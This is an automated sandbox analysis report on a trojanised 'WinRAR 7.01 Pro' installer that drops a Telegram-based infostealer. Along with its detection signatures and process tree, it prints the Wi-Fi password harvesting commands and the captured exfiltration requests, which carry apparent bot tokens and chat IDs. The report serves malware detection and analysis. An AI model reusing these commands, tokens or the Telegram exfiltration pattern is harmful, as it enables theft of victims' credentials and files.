Edit tour

Windows Analysis Report
WinRAR 7.01 Pro.exe

Overview

General Information

Sample name:	WinRAR 7.01 Pro.exe
Analysis ID:	1492461
MD5:	1c8908102946928867ab16f2007b35cc
SHA1:	7e08b98299e0195a013e53221e3c2efb149eb4ce
SHA256:	e3635b82438e536636955e2fee251073b1038a7e00295a1e0efb003ad49965d5
Tags:	exe
Infos:

Detection

PureLog Stealer, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected PureLog Stealer

Yara detected WorldWind Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious desktop.ini Action

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w10x64

WinRAR 7.01 Pro.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\WinRAR 7.01 Pro.exe" MD5: 1C8908102946928867AB16F2007B35CC)

winrar_x64_701ar.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe" MD5: 5E2849BEF6A38ED0B163EA6128AFEA01)

_microsoft_corporation.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe" MD5: B2795FBED63C8C1B0846B3EAEAE2FE0F)

cmd.exe (PID: 3264 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7996 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7420 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 3544 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8024 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8008 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 2104 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
WinRAR 7.01 Pro.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d623:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x5f3:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0xc73:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1f2fd:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1ef43:$s5: delete[] 0xbe268:$s5: delete[] 0x1e3fb:$s6: constructor or from DllMain.

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0._microsoft_corporation.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.WinRAR 7.01 Pro.exe.3b4c9f8.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.3._microsoft_corporation.exe.26bbf08.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.WinRAR 7.01 Pro.exe.3785570.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3e4538:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x3c7508:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x3c7b88:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x3e6212:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x440f0:$s5: delete[] 0x3e5e58:$s5: delete[] 0x3e5310:$s6: constructor or from DllMain.
0.0.WinRAR 7.01 Pro.exe.52173.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0xbdcf5:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.0.WinRAR 7.01 Pro.exe.50000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d623:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x5f3:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0xc73:$s3: 83 EC 38 53 B0 F7 88 44 24 2B 88 44 24 2F B0 6A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1f2fd:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1ef43:$s5: delete[] 0xbe268:$s5: delete[] 0x1e3fb:$s6: constructor or from DllMain.
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, ProcessId: 7740, TargetFilename: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, ParentProcessId: 7740, ParentProcessName: _microsoft_corporation.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 3264, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE WorldWind Stealer Checkin via Telegram (GET) - Source IP: 192.168.2.4 - Destination IP: 149.154.167.220

Timestamp:	2024-08-13T21:48:56.915212+0200
SID:	2044766
Severity:	1
Source Port:	49743
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 149.154.167.220

Timestamp:	2024-08-13T21:48:58.465995+0200
SID:	2803305
Severity:	3
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) - Source IP: 192.168.2.4 - Destination IP: 149.154.167.220

Timestamp:	2024-08-13T21:49:01.755507+0200
SID:	2044557
Severity:	1
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: WinRAR 7.01 Pro.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: WinRAR 7.01 Pro.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: WinRAR 7.01 Pro.exe

Joe Sandbox ML: detected

Source: WinRAR 7.01 Pro.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: WinRAR 7.01 Pro.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.3.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.3.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.3.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.3.dr
Source:	Binary string: _.pdb source: _microsoft_corporation.exe, 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\AppData\Local\Temporary Projects\WinRAR 7.01 Pro\obj\x86\Debug\WinRAR 7.01 Pro.pdb source: WinRAR 7.01 Pro.exe
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BB34D0 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,	1_2_00007FF6C3BB34D0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC9B40 FindFirstFileExW,	1_2_00007FF6C3BC9B40
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BA1F08 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00007FF6C3BA1F08

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.4:49746 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: POST /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271 HTTP/1.1Content-Type: multipart/form-data; boundary="aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636"Host: api.telegram.orgContent-Length: 162674Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="54c32106-8dd3-4cf7-866e-0576783efbb1"Host: api.telegram.orgContent-Length: 162674Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.44.66 104.21.44.66
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.16.185.241 104.16.185.241

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Stealer%202.0.4%20-%20Results:%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 238.14.8.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271 HTTP/1.1Content-Type: multipart/form-data; boundary="aa5c6f7f-c3cb-4f2d-8452-b3f0b7049636"Host: api.telegram.orgContent-Length: 162674Expect: 100-continue

Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
